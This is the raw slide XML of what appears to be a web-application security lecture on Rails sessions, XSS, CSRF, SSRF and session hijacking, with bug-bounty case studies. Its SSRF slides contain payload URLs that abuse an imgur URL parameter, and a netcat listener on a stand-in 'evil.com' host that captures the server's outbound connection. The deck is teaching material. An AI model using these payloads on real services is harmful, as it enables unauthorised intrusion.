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4" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="297" r:id="rId14"/>
    <p:sldId id="296" r:id="rId15"/>
    <p:sldId id="298" r:id="rId16"/>
    <p:sldId id="299" r:id="rId17"/>
    <p:sldId id="303" r:id="rId18"/>
    <p:sldId id="301" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="272" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="269" r:id="rId26"/>
    <p:sldId id="274" r:id="rId27"/>
    <p:sldId id="270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8" r:id="rId40"/>
    <p:sldId id="286" r:id="rId41"/>
    <p:sldId id="287" r:id="rId42"/>
    <p:sldId id="289" r:id="rId43"/>
    <p:sldId id="290" r:id="rId44"/>
    <p:sldId id="291" r:id="rId45"/>
    <p:sldId id="292" r:id="rId46"/>
    <p:sldId id="293" r:id="rId47"/>
    <p:sldId id="294" r:id="rId48"/>
    <p:sldId id="29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77" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-984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E8173-6BA7-BF47-B652-8B3603C76DA5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A040F-E275-0649-A858-9A1BA9610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6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A040F-E275-0649-A858-9A1BA96106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=7M-R6U2i5iI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A040F-E275-0649-A858-9A1BA96106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9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A040F-E275-0649-A858-9A1BA96106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3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4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4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3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4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2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4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5D181-ED4A-A243-B181-A28233511866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726A4-653C-E64A-81D7-D7B1D9CF8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9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7M-R6U2i5iI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someothersite.co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hackerone.com/reports/11574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filtrated.com/research-Instagram-RCE.php" TargetMode="Externa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nsu.instagram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://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook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www.ifc0nfig.com/dominos-pizza-and-payment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hyperlink" Target="http://unsafe.example-bank.com/?SID=d3dD25XfVpi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Web Application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Security -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2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Expiry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Sessions that never expire the time-frame for attacks such as cross-site request forgery, session hijacking and session fixation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expire sessions in a database table. Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session.sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“20 minutes”) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to expire sessions that were used longer than 20 minutes ago.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delete sessions that were created a long time ago.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delete_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>updated_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time.ago.to_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)}’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>created_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.days.ago.to_s(:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’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2222" y="53151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3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Scripting (XSS)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XSS enables attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inject client-side scripts into web pages viewed by other users.</a:t>
            </a:r>
          </a:p>
          <a:p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://www.youtube.com/watch?v=7M-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>R6U2i5iI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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4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Request Forgery (CSRF)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dirty="0"/>
              <a:t>ncluding malicious code or a link in a page that accesses a web application that the user is believed to have authenticated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994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11-07 at 15.1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37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9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CRSF Attack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developer decides to adjust the bonus amount – however they need to trick the payroll administrator into making the change.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hide some CRSF code in another application, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://someothersite.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and wait for the payroll admin to visit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payroll Admin visited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://someothersite.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and didn’t know the hidden CRSF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9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7 at 15.1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7 at 15.1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15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7 at 15.38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5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7 at 15.18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22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7 at 15.1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7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is a stateless protocol. Sessions make it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rails will create a new session automatically </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session method in Rails: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9740" y="3902972"/>
            <a:ext cx="5464273" cy="83099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session[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.id</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(session[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137958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CSRF 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the security token in requests and verify it on the server.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default for newly created rails applications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protect_from_forgery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with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:exception	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Automatically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include a security token in all forms and Ajax requests generated by Rails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Require the client to provide authentication data in any request that involves a sensitive function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expire session cookies.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13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5976" b="-2597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222500" y="5852081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https://hackerone.com/reports/115748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29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6-11-07 at 13.31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33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5375" y="5560794"/>
            <a:ext cx="677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imgur.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>vidgif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bit.ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1e1EYJv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5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03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/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>imgur.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>vidgif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bit.ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1e1EYJv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dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>erver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Side Request Forgery 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-25976" b="-25976"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="663575" y="3194947"/>
            <a:ext cx="2479675" cy="1363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0" y="3314248"/>
            <a:ext cx="2193924" cy="109006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3143250" y="3859280"/>
            <a:ext cx="2032000" cy="17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7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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>imgur.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>vidgif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url?url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sftp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  <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bit.ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1e1EYJv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7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Capture Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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err="1"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>:$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> -v -l 11111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Listening on [0.0.0.0] (family 0, port 11111)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connection from [54.166.236.232] port 11111 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/*] accepted (family 2, sport 35789)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>CLIENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libcurl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7.40.0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QUIT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251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Libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> supports: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SSH (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DICT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GOPHER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TFTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3212640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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://exfiltrated.com/research-Instagram-RCE.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>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993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15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https://sensu.instagram.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean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21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7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session id is a 32 byte long MD5 hash value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it is not feasible to brute-force Rails' session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ids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68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Rails App</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-11-07 at 13.5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79375"/>
            <a:ext cx="7944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61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7 at 13.58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9144000" cy="167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25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7 at 13.5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9144000" cy="38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08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7 at 14.41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700"/>
            <a:ext cx="9144000" cy="42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66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Six of the passwords cracked were "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>changeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three were the same as the user's name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two were "password"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One was "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>instagram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 in source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Outdated dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keys sitting on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5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8152" b="-28152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682625" y="6302375"/>
            <a:ext cx="802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http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html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48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6-11-07 at 14.44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8" b="-1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855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158875" y="6126163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http://www.ifc0nfig.com/dominos-pizza-and-payments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51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11-07 at 14.51.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98" r="-16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36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Hijacking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Stealing a user's session id lets an attacker use the web application in the victim's name.	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniff the cookie in an insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide a secure connection over SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Rails 3.1 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>later, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in your application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config.force_ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true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Most people don't clear out the cookies after working at a public terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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Provide the user with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>log-out button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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6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11-07 at 14.52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82" r="-120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8189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Failure Response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9000" y="1889125"/>
            <a:ext cx="72507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&lt;Response&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CardTxn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    &lt;</a:t>
            </a:r>
            <a:r>
